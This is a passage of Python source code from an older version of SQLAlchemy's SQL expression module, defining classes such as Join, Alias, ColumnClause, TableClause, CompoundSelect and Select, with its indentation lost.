(_literal_as_binds(c).self_group(), _literal_as_binds(r)) for (c, r) in whens
]
else:
whenlist = [
(_no_literals(c).self_group(), _literal_as_binds(r)) for (c, r) in whens
]
if whenlist:
type_ = list(whenlist[-1])[-1].type
else:
type_ = None
if value is None:
self.value = None
else:
self.value = _literal_as_binds(value)
self.type = type_
self.whens = whenlist
if else_ is not None:
self.else_ = _literal_as_binds(else_)
else:
self.else_ = None
def _copy_internals(self, clone=_clone):
if self.value is not None:
self.value = clone(self.value)
self.whens = [(clone(x), clone(y)) for x, y in self.whens]
if self.else_ is not None:
self.else_ = clone(self.else_)
def get_children(self, **kwargs):
if self.value is not None:
yield self.value
for x, y in self.whens:
yield x
yield y
if self.else_ is not None:
yield self.else_
@property
def _from_objects(self):
return list(itertools.chain(*[x._from_objects for x in self.get_children()]))
class FunctionElement(Executable, ColumnElement, FromClause):
"""Base for SQL function-oriented constructs."""
def __init__(self, *clauses, **kwargs):
args = [_literal_as_binds(c, self.name) for c in clauses]
self.clause_expr = ClauseList(
operator=operators.comma_op,
group_contents=True, *args).\
self_group()
@property
def columns(self):
return [self]
@util.memoized_property
def clauses(self):
return self.clause_expr.element
@property
def _from_objects(self):
return self.clauses._from_objects
def get_children(self, **kwargs):
return self.clause_expr,
def _copy_internals(self, clone=_clone):
self.clause_expr = clone(self.clause_expr)
self._reset_exported()
util.reset_memoized(self, 'clauses')
def select(self):
s = select([self])
if self._execution_options:
s = s.execution_options(**self._execution_options)
return s
def scalar(self):
return self.select().execute().scalar()
def execute(self):
return self.select().execute()
def _bind_param(self, obj):
return _BindParamClause(None, obj, _fallback_type=self.type, unique=True)
class Function(FunctionElement):
"""Describe a named SQL function."""
__visit_name__ = 'function'
def __init__(self, name, *clauses, **kw):
self.packagenames = kw.pop('packagenames', None) or []
self.name = name
self._bind = kw.get('bind', None)
self.type = sqltypes.to_instance(kw.get('type_', None))
FunctionElement.__init__(self, *clauses, **kw)
def _bind_param(self, obj):
return _BindParamClause(self.name, obj, _fallback_type=self.type, unique=True)
class _Cast(ColumnElement):
__visit_name__ = 'cast'
def __init__(self, clause, totype, **kwargs):
self.type = sqltypes.to_instance(totype)
self.clause = _literal_as_binds(clause, None)
self.typeclause = _TypeClause(self.type)
def _copy_internals(self, clone=_clone):
self.clause = clone(self.clause)
self.typeclause = clone(self.typeclause)
def get_children(self, **kwargs):
return self.clause, self.typeclause
@property
def _from_objects(self):
return self.clause._from_objects
class _Extract(ColumnElement):
__visit_name__ = 'extract'
def __init__(self, field, expr, **kwargs):
self.type = sqltypes.Integer()
self.field = field
self.expr = _literal_as_binds(expr, None)
def _copy_internals(self, clone=_clone):
self.expr = clone(self.expr)
def get_children(self, **kwargs):
return self.expr,
@property
def _from_objects(self):
return self.expr._from_objects
class _UnaryExpression(ColumnElement):
__visit_name__ = 'unary'
def __init__(self, element, operator=None, modifier=None, type_=None, negate=None):
self.operator = operator
self.modifier = modifier
self.element = _literal_as_text(element).self_group(against=self.operator or self.modifier)
self.type = sqltypes.to_instance(type_)
self.negate = negate
@property
def _from_objects(self):
return self.element._from_objects
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
def get_children(self, **kwargs):
return self.element,
def compare(self, other, **kw):
"""Compare this :class:`_UnaryExpression` against the given :class:`ClauseElement`."""
return (
isinstance(other, _UnaryExpression) and
self.operator == other.operator and
self.modifier == other.modifier and
self.element.compare(other.element, **kw)
)
def _negate(self):
if self.negate is not None:
return _UnaryExpression(
self.element,
operator=self.negate,
negate=self.operator,
modifier=self.modifier,
type_=self.type)
else:
return super(_UnaryExpression, self)._negate()
def self_group(self, against=None):
if self.operator and operators.is_precedent(self.operator, against):
return _Grouping(self)
else:
return self
class _BinaryExpression(ColumnElement):
"""Represent an expression that is ``LEFT <operator> RIGHT``."""
__visit_name__ = 'binary'
def __init__(self, left, right, operator, type_=None, negate=None, modifiers=None):
self.left = _literal_as_text(left).self_group(against=operator)
self.right = _literal_as_text(right).self_group(against=operator)
self.operator = operator
self.type = sqltypes.to_instance(type_)
self.negate = negate
if modifiers is None:
self.modifiers = {}
else:
self.modifiers = modifiers
def __nonzero__(self):
try:
return self.operator(hash(self.left), hash(self.right))
except:
raise TypeError("Boolean value of this clause is not defined")
@property
def _from_objects(self):
return self.left._from_objects + self.right._from_objects
def _copy_internals(self, clone=_clone):
self.left = clone(self.left)
self.right = clone(self.right)
def get_children(self, **kwargs):
return self.left, self.right
def compare(self, other, **kw):
"""Compare this :class:`_BinaryExpression` against the given :class:`_BinaryExpression`."""
return (
isinstance(other, _BinaryExpression) and
self.operator == other.operator and
(
self.left.compare(other.left, **kw) and
self.right.compare(other.right, **kw) or
(
operators.is_commutative(self.operator) and
self.left.compare(other.right, **kw) and
self.right.compare(other.left, **kw)
)
)
)
def self_group(self, against=None):
# use small/large defaults for comparison so that unknown
# operators are always parenthesized
if self.operator is not against and operators.is_precedent(self.operator, against):
return _Grouping(self)
else:
return self
def _negate(self):
if self.negate is not None:
return _BinaryExpression(
self.left,
self.right,
self.negate,
negate=self.operator,
type_=sqltypes.BOOLEANTYPE,
modifiers=self.modifiers)
else:
return super(_BinaryExpression, self)._negate()
class _Exists(_UnaryExpression):
__visit_name__ = _UnaryExpression.__visit_name__
_from_objects = []
def __init__(self, *args, **kwargs):
if args and isinstance(args[0], (_SelectBaseMixin, _ScalarSelect)):
s = args[0]
else:
if not args:
args = ([literal_column('*')],)
s = select(*args, **kwargs).as_scalar().self_group()
_UnaryExpression.__init__(self, s, operator=operators.exists, type_=sqltypes.Boolean)
def select(self, whereclause=None, **params):
return select([self], whereclause, **params)
def correlate(self, fromclause):
e = self._clone()
e.element = self.element.correlate(fromclause).self_group()
return e
def select_from(self, clause):
"""return a new exists() construct with the given expression set as its FROM
clause.
"""
e = self._clone()
e.element = self.element.select_from(clause).self_group()
return e
def where(self, clause):
"""return a new exists() construct with the given expression added to its WHERE
clause, joined to the existing clause via AND, if any.
"""
e = self._clone()
e.element = self.element.where(clause).self_group()
return e
class Join(FromClause):
"""represent a ``JOIN`` construct between two :class:`FromClause` elements.
The public constructor function for :class:`Join` is the module-level
:func:`join()` function, as well as the :func:`join()` method available
off all :class:`FromClause` subclasses.
"""
__visit_name__ = 'join'
def __init__(self, left, right, onclause=None, isouter=False):
self.left = _literal_as_text(left)
self.right = _literal_as_text(right).self_group()
if onclause is None:
self.onclause = self._match_primaries(self.left, self.right)
else:
self.onclause = onclause
self.isouter = isouter
self.__folded_equivalents = None
@property
def description(self):
return "Join object on %s(%d) and %s(%d)" % (
self.left.description,
id(self.left),
self.right.description,
id(self.right))
def is_derived_from(self, fromclause):
return fromclause is self or \
self.left.is_derived_from(fromclause) or\
self.right.is_derived_from(fromclause)
def self_group(self, against=None):
return _FromGrouping(self)
def _populate_column_collection(self):
columns = [c for c in self.left.columns] + [c for c in self.right.columns]
global sql_util
if not sql_util:
from sqlalchemy.sql import util as sql_util
self._primary_key.extend(sql_util.reduce_columns(
(c for c in columns if c.primary_key), self.onclause))
self._columns.update((col._label, col) for col in columns)
self._foreign_keys.update(itertools.chain(*[col.foreign_keys for col in columns]))
def _copy_internals(self, clone=_clone):
self._reset_exported()
self.left = clone(self.left)
self.right = clone(self.right)
self.onclause = clone(self.onclause)
self.__folded_equivalents = None
def get_children(self, **kwargs):
return self.left, self.right, self.onclause
def _match_primaries(self, primary, secondary):
global sql_util
if not sql_util:
from sqlalchemy.sql import util as sql_util
return sql_util.join_condition(primary, secondary)
def select(self, whereclause=None, fold_equivalents=False, **kwargs):
"""Create a :class:`Select` from this :class:`Join`.
:param whereclause: the WHERE criterion that will be sent to
the :func:`select()` function
:param fold_equivalents: based on the join criterion of this
:class:`Join`, do not include
repeat column names in the column list of the resulting
select, for columns that are calculated to be "equivalent"
based on the join criterion of this :class:`Join`. This will
recursively apply to any joins directly nested by this one
as well. This flag is specific to a particular use case
by the ORM and is deprecated as of 0.6.
:param \**kwargs: all other kwargs are sent to the
underlying :func:`select()` function.
"""
if fold_equivalents:
global sql_util
if not sql_util:
from sqlalchemy.sql import util as sql_util
util.warn_deprecated("fold_equivalents is deprecated.")
collist = sql_util.folded_equivalents(self)
else:
collist = [self.left, self.right]
return select(collist, whereclause, from_obj=[self], **kwargs)
@property
def bind(self):
return self.left.bind or self.right.bind
def alias(self, name=None):
"""Create a :class:`Select` out of this :class:`Join` clause and return an :class:`Alias` of it.
The :class:`Select` is not correlating.
"""
return self.select(use_labels=True, correlate=False).alias(name)
@property
def _hide_froms(self):
return itertools.chain(*[_from_objects(x.left, x.right) for x in self._cloned_set])
@property
def _from_objects(self):
return [self] + \
self.onclause._from_objects + \
self.left._from_objects + \
self.right._from_objects
class Alias(FromClause):
"""Represents an table or selectable alias (AS).
Represents an alias, as typically applied to any table or
sub-select within a SQL statement using the ``AS`` keyword (or
without the keyword on certain databases such as Oracle).
This object is constructed from the :func:`alias()` module level
function as well as the :func:`alias()` method available on all
:class:`FromClause` subclasses.
"""
__visit_name__ = 'alias'
named_with_column = True
def __init__(self, selectable, alias=None):
baseselectable = selectable
while isinstance(baseselectable, Alias):
baseselectable = baseselectable.element
self.original = baseselectable
self.supports_execution = baseselectable.supports_execution
if self.supports_execution:
self._execution_options = baseselectable._execution_options
self.element = selectable
if alias is None:
if self.original.named_with_column:
alias = getattr(self.original, 'name', None)
alias = _generated_label('%%(%d %s)s' % (id(self), alias or 'anon'))
self.name = alias
@property
def description(self):
# Py3K
#return self.name
# Py2K
return self.name.encode('ascii', 'backslashreplace')
# end Py2K
def as_scalar(self):
try:
return self.element.as_scalar()
except AttributeError:
raise AttributeError("Element %s does not support 'as_scalar()'" % self.element)
def is_derived_from(self, fromclause):
if fromclause in self._cloned_set:
return True
return self.element.is_derived_from(fromclause)
def _populate_column_collection(self):
for col in self.element.columns:
col._make_proxy(self)
def _copy_internals(self, clone=_clone):
self._reset_exported()
self.element = _clone(self.element)
baseselectable = self.element
while isinstance(baseselectable, Alias):
baseselectable = baseselectable.element
self.original = baseselectable
def get_children(self, column_collections=True, aliased_selectables=True, **kwargs):
if column_collections:
for c in self.c:
yield c
if aliased_selectables:
yield self.element
@property
def _from_objects(self):
return [self]
@property
def bind(self):
return self.element.bind
class _Grouping(ColumnElement):
"""Represent a grouping within a column expression"""
__visit_name__ = 'grouping'
def __init__(self, element):
self.element = element
self.type = getattr(element, 'type', None)
@property
def _label(self):
return getattr(self.element, '_label', None) or self.anon_label
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
def get_children(self, **kwargs):
return self.element,
@property
def _from_objects(self):
return self.element._from_objects
def __getattr__(self, attr):
return getattr(self.element, attr)
def __getstate__(self):
return {'element':self.element, 'type':self.type}
def __setstate__(self, state):
self.element = state['element']
self.type = state['type']
class _FromGrouping(FromClause):
"""Represent a grouping of a FROM clause"""
__visit_name__ = 'grouping'
def __init__(self, element):
self.element = element
@property
def columns(self):
return self.element.columns
@property
def _hide_froms(self):
return self.element._hide_froms
def get_children(self, **kwargs):
return self.element,
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
@property
def _from_objects(self):
return self.element._from_objects
def __getattr__(self, attr):
return getattr(self.element, attr)
def __getstate__(self):
return {'element':self.element}
def __setstate__(self, state):
self.element = state['element']
class _Label(ColumnElement):
"""Represents a column label (AS).
Represent a label, as typically applied to any column-level
element using the ``AS`` sql keyword.
This object is constructed from the :func:`label()` module level
function as well as the :func:`label()` method available on all
:class:`ColumnElement` subclasses.
"""
__visit_name__ = 'label'
def __init__(self, name, element, type_=None):
while isinstance(element, _Label):
element = element.element
self.name = self.key = self._label = name or \
_generated_label("%%(%d %s)s" % (
id(self), getattr(element, 'name', 'anon'))
)
self._element = element
self._type = type_
self.quote = element.quote
@util.memoized_property
def type(self):
return sqltypes.to_instance(
self._type or getattr(self._element, 'type', None)
)
@util.memoized_property
def element(self):
return self._element.self_group(against=operators.as_)
def _proxy_attr(name):
get = attrgetter(name)
def attr(self):
return get(self.element)
return property(attr)
proxies = _proxy_attr('proxies')
base_columns = _proxy_attr('base_columns')
proxy_set = _proxy_attr('proxy_set')
primary_key = _proxy_attr('primary_key')
foreign_keys = _proxy_attr('foreign_keys')
def get_children(self, **kwargs):
return self.element,
def _copy_internals(self, clone=_clone):
self.element = clone(self.element)
@property
def _from_objects(self):
return self.element._from_objects
def _make_proxy(self, selectable, name = None):
if isinstance(self.element, (Selectable, ColumnElement)):
e = self.element._make_proxy(selectable, name=self.name)
else:
e = column(self.name)._make_proxy(selectable=selectable)
e.proxies.append(self)
return e
class ColumnClause(_Immutable, ColumnElement):
"""Represents a generic column expression from any textual string.
This includes columns associated with tables, aliases and select
statements, but also any arbitrary text. May or may not be bound
to an underlying :class:`Selectable`. :class:`ColumnClause` is usually
created publically via the :func:`column()` function or the
:func:`literal_column()` function.
text
the text of the element.
selectable
parent selectable.
type
``TypeEngine`` object which can associate this :class:`ColumnClause`
with a type.
is_literal
if True, the :class:`ColumnClause` is assumed to be an exact
expression that will be delivered to the output with no quoting
rules applied regardless of case sensitive settings. the
:func:`literal_column()` function is usually used to create such a
:class:`ColumnClause`.
"""
__visit_name__ = 'column'
onupdate = default = server_default = server_onupdate = None
def __init__(self, text, selectable=None, type_=None, is_literal=False):
self.key = self.name = text
self.table = selectable
self.type = sqltypes.to_instance(type_)
self.is_literal = is_literal
@util.memoized_property
def description(self):
# Py3K
#return self.name
# Py2K
return self.name.encode('ascii', 'backslashreplace')
# end Py2K
@util.memoized_property
def _label(self):
if self.is_literal:
return None
elif self.table is not None and self.table.named_with_column:
if getattr(self.table, 'schema', None):
label = self.table.schema.replace('.', '_') + "_" + \
_escape_for_generated(self.table.name) + "_" + \
_escape_for_generated(self.name)
else:
label = _escape_for_generated(self.table.name) + "_" + \
_escape_for_generated(self.name)
return _generated_label(label)
else:
return self.name
def label(self, name):
if name is None:
return self
else:
return super(ColumnClause, self).label(name)
@property
def _from_objects(self):
if self.table is not None:
return [self.table]
else:
return []
def _bind_param(self, obj):
return _BindParamClause(self.name, obj, _fallback_type=self.type, unique=True)
def _make_proxy(self, selectable, name=None, attach=True):
# propagate the "is_literal" flag only if we are keeping our name,
# otherwise its considered to be a label
is_literal = self.is_literal and (name is None or name == self.name)
c = ColumnClause(
name or self.name,
selectable=selectable,
type_=self.type,
is_literal=is_literal
)
c.proxies = [self]
if attach:
selectable.columns[c.name] = c
return c
class TableClause(_Immutable, FromClause):
"""Represents a "table" construct.
Note that this represents tables only as another syntactical
construct within SQL expressions; it does not provide schema-level
functionality.
"""
__visit_name__ = 'table'
named_with_column = True
def __init__(self, name, *columns):
super(TableClause, self).__init__()
self.name = self.fullname = name
self._columns = ColumnCollection()
self._primary_key = ColumnSet()
self._foreign_keys = set()
for c in columns:
self.append_column(c)
def _export_columns(self):
raise NotImplementedError()
@util.memoized_property
def description(self):
# Py3K
#return self.name
# Py2K
return self.name.encode('ascii', 'backslashreplace')
# end Py2K
def append_column(self, c):
self._columns[c.name] = c
c.table = self
def get_children(self, column_collections=True, **kwargs):
if column_collections:
return [c for c in self.c]
else:
return []
def count(self, whereclause=None, **params):
"""return a SELECT COUNT generated against this :class:`TableClause`."""
if self.primary_key:
col = list(self.primary_key)[0]
else:
col = list(self.columns)[0]
return select(
[func.count(col).label('tbl_row_count')],
whereclause,
from_obj=[self],
**params)
def insert(self, values=None, inline=False, **kwargs):
"""Generate an :func:`insert()` construct."""
return insert(self, values=values, inline=inline, **kwargs)
def update(self, whereclause=None, values=None, inline=False, **kwargs):
"""Generate an :func:`update()` construct."""
return update(self, whereclause=whereclause,
values=values, inline=inline, **kwargs)
def delete(self, whereclause=None, **kwargs):
"""Generate a :func:`delete()` construct."""
return delete(self, whereclause, **kwargs)
@property
def _from_objects(self):
return [self]
class _SelectBaseMixin(Executable):
"""Base class for :class:`Select` and ``CompoundSelects``."""
def __init__(self,
use_labels=False,
for_update=False,
limit=None,
offset=None,
order_by=None,
group_by=None,
bind=None,
autocommit=None):
self.use_labels = use_labels
self.for_update = for_update
if autocommit is not None:
util.warn_deprecated("autocommit on select() is deprecated. "
"Use .execution_options(autocommit=True)")
self._execution_options = self._execution_options.union({'autocommit':autocommit})
self._limit = limit
self._offset = offset
self._bind = bind
self._order_by_clause = ClauseList(*util.to_list(order_by) or [])
self._group_by_clause = ClauseList(*util.to_list(group_by) or [])
def as_scalar(self):
"""return a 'scalar' representation of this selectable, which can be
used as a column expression.
Typically, a select statement which has only one column in its columns
clause is eligible to be used as a scalar expression.
The returned object is an instance of
:class:`_ScalarSelect`.
"""
return _ScalarSelect(self)
@_generative
def apply_labels(self):
"""return a new selectable with the 'use_labels' flag set to True.
This will result in column expressions being generated using labels
against their table name, such as "SELECT somecolumn AS
tablename_somecolumn". This allows selectables which contain multiple
FROM clauses to produce a unique set of column names regardless of
name conflicts among the individual FROM clauses.
"""
self.use_labels = True
def label(self, name):
"""return a 'scalar' representation of this selectable, embedded as a
subquery with a label.
See also ``as_scalar()``.
"""
return self.as_scalar().label(name)
@_generative
@util.deprecated(message="autocommit() is deprecated. "
"Use .execution_options(autocommit=True)")
def autocommit(self):
"""return a new selectable with the 'autocommit' flag set to True."""
self._execution_options = self._execution_options.union({'autocommit':True})
def _generate(self):
"""Override the default _generate() method to also clear out exported collections."""
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
s._reset_exported()
return s
@_generative
def limit(self, limit):
"""return a new selectable with the given LIMIT criterion applied."""
self._limit = limit
@_generative
def offset(self, offset):
"""return a new selectable with the given OFFSET criterion applied."""
self._offset = offset
@_generative
def order_by(self, *clauses):
"""return a new selectable with the given list of ORDER BY criterion applied.
The criterion will be appended to any pre-existing ORDER BY criterion.
"""
self.append_order_by(*clauses)
@_generative
def group_by(self, *clauses):
"""return a new selectable with the given list of GROUP BY criterion applied.
The criterion will be appended to any pre-existing GROUP BY criterion.
"""
self.append_group_by(*clauses)
def append_order_by(self, *clauses):
"""Append the given ORDER BY criterion applied to this selectable.
The criterion will be appended to any pre-existing ORDER BY criterion.
"""
if len(clauses) == 1 and clauses[0] is None:
self._order_by_clause = ClauseList()
else:
if getattr(self, '_order_by_clause', None) is not None:
clauses = list(self._order_by_clause) + list(clauses)
self._order_by_clause = ClauseList(*clauses)
def append_group_by(self, *clauses):
"""Append the given GROUP BY criterion applied to this selectable.
The criterion will be appended to any pre-existing GROUP BY criterion.
"""
if len(clauses) == 1 and clauses[0] is None:
self._group_by_clause = ClauseList()
else:
if getattr(self, '_group_by_clause', None) is not None:
clauses = list(self._group_by_clause) + list(clauses)
self._group_by_clause = ClauseList(*clauses)
@property
def _from_objects(self):
return [self]
class _ScalarSelect(_Grouping):
_from_objects = []
def __init__(self, element):
self.element = element
cols = list(element.c)
self.type = cols[0].type
@property
def columns(self):
raise exc.InvalidRequestError("Scalar Select expression has no columns; "
"use this object directly within a column-level expression.")
c = columns
def self_group(self, **kwargs):
return self
def _make_proxy(self, selectable, name):
return list(self.inner_columns)[0]._make_proxy(selectable, name)
class CompoundSelect(_SelectBaseMixin, FromClause):
"""Forms the basis of ``UNION``, ``UNION ALL``, and other
SELECT-based set operations."""
__visit_name__ = 'compound_select'
def __init__(self, keyword, *selects, **kwargs):
self._should_correlate = kwargs.pop('correlate', False)
self.keyword = keyword
self.selects = []
numcols = None
# some DBs do not like ORDER BY in the inner queries of a UNION, etc.
for n, s in enumerate(selects):
s = _clause_element_as_expr(s)
if not numcols:
numcols = len(s.c)
elif len(s.c) != numcols:
raise exc.ArgumentError(
"All selectables passed to CompoundSelect must "
"have identical numbers of columns; select #%d has %d columns,"
" select #%d has %d" %
(1, len(self.selects[0].c), n+1, len(s.c))
)
self.selects.append(s.self_group(self))
_SelectBaseMixin.__init__(self, **kwargs)
def self_group(self, against=None):
return _FromGrouping(self)
def is_derived_from(self, fromclause):
for s in self.selects:
if s.is_derived_from(fromclause):
return True
return False
def _populate_column_collection(self):
for cols in zip(*[s.c for s in self.selects]):
# this is a slightly hacky thing - the union exports a column that
# resembles just that of the *first* selectable. to get at a "composite" column,
# particularly foreign keys, you have to dig through the proxies collection
# which we generate below. We may want to improve upon this,
# such as perhaps _make_proxy can accept a list of other columns that
# are "shared" - schema.column can then copy all the ForeignKeys in.
# this would allow the union() to have all those fks too.
proxy = cols[0]._make_proxy(
self, name=self.use_labels and cols[0]._label or None)
# hand-construct the "proxies" collection to include all derived columns
# place a 'weight' annotation corresponding to how low in the list of
# select()s the column occurs, so that the corresponding_column() operation
# can resolve conflicts
proxy.proxies = [c._annotate({'weight':i + 1}) for i, c in enumerate(cols)]
def _copy_internals(self, clone=_clone):
self._reset_exported()
self.selects = [clone(s) for s in self.selects]
if hasattr(self, '_col_map'):
del self._col_map
for attr in ('_order_by_clause', '_group_by_clause'):
if getattr(self, attr) is not None:
setattr(self, attr, clone(getattr(self, attr)))
def get_children(self, column_collections=True, **kwargs):
return (column_collections and list(self.c) or []) + \
[self._order_by_clause, self._group_by_clause] + list(self.selects)
def bind(self):
if self._bind:
return self._bind
for s in self.selects:
e = s.bind
if e:
return e
else:
return None
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
class Select(_SelectBaseMixin, FromClause):
"""Represents a ``SELECT`` statement.
Select statements support appendable clauses, as well as the
ability to execute themselves and return a result set.
"""
__visit_name__ = 'select'
_prefixes = ()
def __init__(self,
columns,
whereclause=None,
from_obj=None,
distinct=False,
having=None,
correlate=True,
prefixes=None,
**kwargs):
"""Construct a Select object.
The public constructor for Select is the
:func:`select` function; see that function for
argument descriptions.
Additional generative and mutator methods are available on the
:class:`_SelectBaseMixin` superclass.
"""
self._should_correlate = correlate
self._distinct = distinct
self._correlate = set()
self._froms = util.OrderedSet()
try:
cols_present = bool(columns)
except TypeError:
raise exc.ArgumentError("columns argument to select() must "
"be a Python list or other iterable")
if cols_present:
self._raw_columns = []
for c in columns:
c = _literal_as_column(c)
if isinstance(c, _ScalarSelect):
c = c.self_group(against=operators.comma_op)
self._raw_columns.append(c)
self._froms.update(_from_objects(*self._raw_columns))
else:
self._raw_columns = []
if whereclause is not None:
self._whereclause = _literal_as_text(whereclause)
self._froms.update(_from_objects(self._whereclause))
else:
self._whereclause = None
if from_obj is not None:
for f in util.to_list(from_obj):
if _is_literal(f):
self._froms.add(_TextClause(f))
else:
self._froms.add(f)
if having is not None:
self._having = _literal_as_text(having)
else:
self._having = None
if prefixes:
self._prefixes = tuple([_literal_as_text(p) for p in prefixes])
_SelectBaseMixin.__init__(self, **kwargs)
def _get_display_froms(self, existing_froms=None):
"""Return the full list of 'from' clauses to be displayed.
Takes into account a set of existing froms which may be
rendered in the FROM clause of enclosing selects; this Select
may want to leave those absent if it is automatically
correlating.
"""
froms = self._froms
toremove = itertools.chain(*[f._hide_froms for f in froms])
if toremove:
froms = froms.difference(toremove)
if len(froms) > 1 or self._correlate:
if self._correlate:
froms = froms.difference(_cloned_intersection(froms, self._correlate))
if self._should_correlate and existing_froms:
froms = froms.difference(_cloned_intersection(froms, existing_froms))
if not len(froms):
raise exc.InvalidRequestError(
"Select statement '%s' returned no FROM clauses "
"due to auto-correlation; specify correlate(<tables>) "
"to control correlation manually." % self)
return froms
@property
def froms(self):
"""Return the displayed list of FromClause elements."""
return self._get_display_froms()
@property
def type(self):
raise exc.InvalidRequestError("Select objects don't have a type. "
"Call as_scalar() on this Select object "
"to return a 'scalar' version of this Select.")
@util.memoized_instancemethod
def locate_all_froms(self):
"""return a Set of all FromClause elements referenced by this Select.
This set is a superset of that returned by the ``froms`` property, which
is specifically for those FromClause elements that would actually be rendered.
"""
return self._froms.union(_from_objects(*list(self._froms)))
@property
def inner_columns(self):
"""an iterator of all ColumnElement expressions which would
be rendered into the columns clause of the resulting SELECT statement.
"""
return _select_iterables(self._raw_columns)
def is_derived_from(self, fromclause):
if self in fromclause._cloned_set:
return True
for f in self.locate_all_froms():
if f.is_derived_from(fromclause):
return True
return False
def _copy_internals(self, clone=_clone):
self._reset_exported()
from_cloned = dict((f, clone(f))
for f in self._froms.union(self._correlate))
self._froms = util.OrderedSet(from_cloned[f] for f in self._froms)
self._correlate = set(from_cloned[f] for f in self._correlate)
self._raw_columns = [clone(c) for c in self._raw_columns]
for attr in ('_whereclause', '_having', '_order_by_clause', '_group_by_clause'):
if getattr(self, attr) is not None:
setattr(self, attr, clone(getattr(self, attr)))
def get_children(self, column_collections=True, **kwargs):
"""return child elements as per the ClauseElement specification."""
return (column_collections and list(self.columns) or []) + \
self._raw_columns + list(self._froms) + \
[x for x in
(self._whereclause, self._having,
self._order_by_clause, self._group_by_clause)
if x is not None]
@_generative
def column(self, column):
"""return a new select() construct with the given column expression
added to its columns clause.
"""
column = _literal_as_column(column)
if isinstance(column, _ScalarSelect):
column = column.self_group(against=operators.comma_op)
self._raw_columns = self._raw_columns + [column]
self._froms = self._froms.union(_from_objects(column))
@_generative
def with_only_columns(self, columns):
"""return a new select() construct with its columns clause replaced
with the given columns.
"""
self._raw_columns = [
isinstance(c, _ScalarSelect) and
c.self_group(against=operators.comma_op) or c
for c in [_literal_as_column(c) for c in columns]
]
@_generative
def where(self, whereclause):
"""return a new select() construct with the given expression added to its
WHERE clause, joined to the existing clause via AND, if any.
"""
self.append_whereclause(whereclause)
@_generative
def having(self, having):
"""return a new select() construct with the given expression added to its HAVING
clause, joined to the existing clause via AND, if any.
"""
self.append_having(having)
@_generative
def distinct(self):
"""return a new select() construct which will apply DISTINCT to its columns
clause.
"""
self._distinct = True
@_generative
def prefix_with(self, clause):
"""return a new select() construct which will apply the given expression to the
start of its columns clause, not using any commas.
"""
clause = _literal_as_text(clause)
self._prefixes = self._prefixes + (clause,)
@_generative
def select_from(self, fromclause):
"""return a new select() construct with the given FROM expression applied to its
list of FROM objects.
"""
fromclause = _literal_as_text(fromclause)
self._froms = self._froms.union([fromclause])
@_generative
def correlate(self, *fromclauses):
"""return a new select() construct which will correlate the given FROM clauses to
that of an enclosing select(), if a match is found.
By "match", the given fromclause must be present in this select's list of FROM
objects and also present in an enclosing select's list of FROM objects.
Calling this method turns off the select's default behavior of
"auto-correlation". Normally, select() auto-correlates all of its FROM clauses to
those of an embedded select when compiled.
If the fromclause is None, correlation is disabled for the returned select().
"""
self._should_correlate = False
if fromclauses == (None,):
self._correlate = set()
else:
self._correlate = self._correlate.union(fromclauses)
def append_correlation(self, fromclause):
"""append the given correlation expression to this select() construct."""
self._should_correlate = False
self._correlate = self._correlate.union([fromclause])
def append_column(self, column):
"""append the given column expression to the columns clause of this select()
construct.
"""
column = _literal_as_column(column)
if isinstance(column, _ScalarSelect):
column = column.self_group(against=operators.comma_op)
self._raw_columns = self._raw_columns + [column]
self._froms = self._froms.union(_from_objects(column))
self._reset_exported()
def append_prefix(self, clause):
"""append the given columns clause prefix expression to this select()
construct.
"""
clause = _literal_as_text(clause)
self._prefixes = self._prefixes + (clause,)
def append_whereclause(self, whereclause):
"""append the given expression to this select() construct's WHERE criterion.
The expression will be joined to existing WHERE criterion via AND.
"""
whereclause = _literal_as_text(whereclause)
self._froms = self._froms.union(_from_objects(whereclause))
if self._whereclause is not None:
self._whereclause = and_(self._whereclause, whereclause)
else:
self._whereclause = whereclause
def append_having(self, having):
"""append the given expression to this select() construct's HAVING criterion.
The expression will be joined to existing HAVING criterion via AND.
"""
if self._having is not None:
self._having = and_(self._having, _literal_as_text(having))
else:
self._having = _literal_as_text(having)
def append_from(self, fromclause):
"""append the given FromClause expression to this select() construct's FROM
clause.
"""
if _is_literal(fromclause):
fromclause = _TextClause(fromclause)
self._froms = self._froms.union([fromclause])
def __exportable_columns(self):
for column in self._raw_columns:
if isinstance(column, Selectable):
for co in column.columns:
yield co
elif isinstance(column, ColumnElement):
yield column
else:
continue
def _populate_column_collection(self):
for c in self.__exportable_columns():
c._make_proxy(self, name=self.use_labels and c._label or None)
def self_group(self, against=None):
"""return a 'grouping' construct as per the ClauseElement specification.
This produces an element that can be embedded in an expression. Note that
this method is called automatically as needed when constructing expressions.
"""
if isinstance(against, CompoundSelect):
return self
return _FromGrouping(self)
def union(self, other, **kwargs):
"""return a SQL UNION of this select() construct against the given selectable."""
return union(self, other, **kwargs)
def union_all(self, other, **kwargs):
"""return a SQL UNION ALL of this select() construct against the given
selectable.
"""
return union_all(self, other, **kwargs)
def except_(self, other, **kwargs):
"""return a SQL EXCEPT of this select() construct against the given selectable."""
return except_(self, other, **kwargs)
def except_all(self, other, **kwargs):
"""return a SQL EXCEPT ALL of this select() construct against the given
selectable.
"""
return except_all(self, other, **kwargs)
def intersect(self, other, **kwargs):
"""return a SQL INTERSECT of this select() construct against the given
selectable.
"""
return intersect(self, other, **kwargs)
def intersect_all(self, other, **kwargs):
"""return a SQL INTERSECT ALL of this select() construct against the given
selectable.
"""
return intersect_all(self, other, **kwargs)
def bind(self):
if self._bind:
return self._bind
if not self._froms:
for c in self._raw_columns:
e = c.bind
if e:
self._bind = e
return e
else:
e = list(self._froms)[0].bind
if e:
self._bind = e
return e
return None
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
class _UpdateBase(Executable, ClauseElement):
"""Form the base for ``INSERT``, ``UPDATE``, and ``DELETE`` statements."""
__visit_name__ = 'update_base'
_execution_options = Executable._execution_options.union({'autocommit':True})
kwargs = util.frozendict()
def _process_colparams(self, parameters):
if isinstance(parameters, (list, tuple)):
pp = {}
for i, c in enumerate(self.table.c):
pp[c.key] = parameters[i]
return pp
else:
return parameters
def params(self, *arg, **kw):
raise NotImplementedError(
"params() is not supported for INSERT/UPDATE/DELETE statements."
" To set the values for an INSERT or UPDATE statement, use"
" stmt.values(**parameters).")
def bind(self):
return self._bind or self.table.bind
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
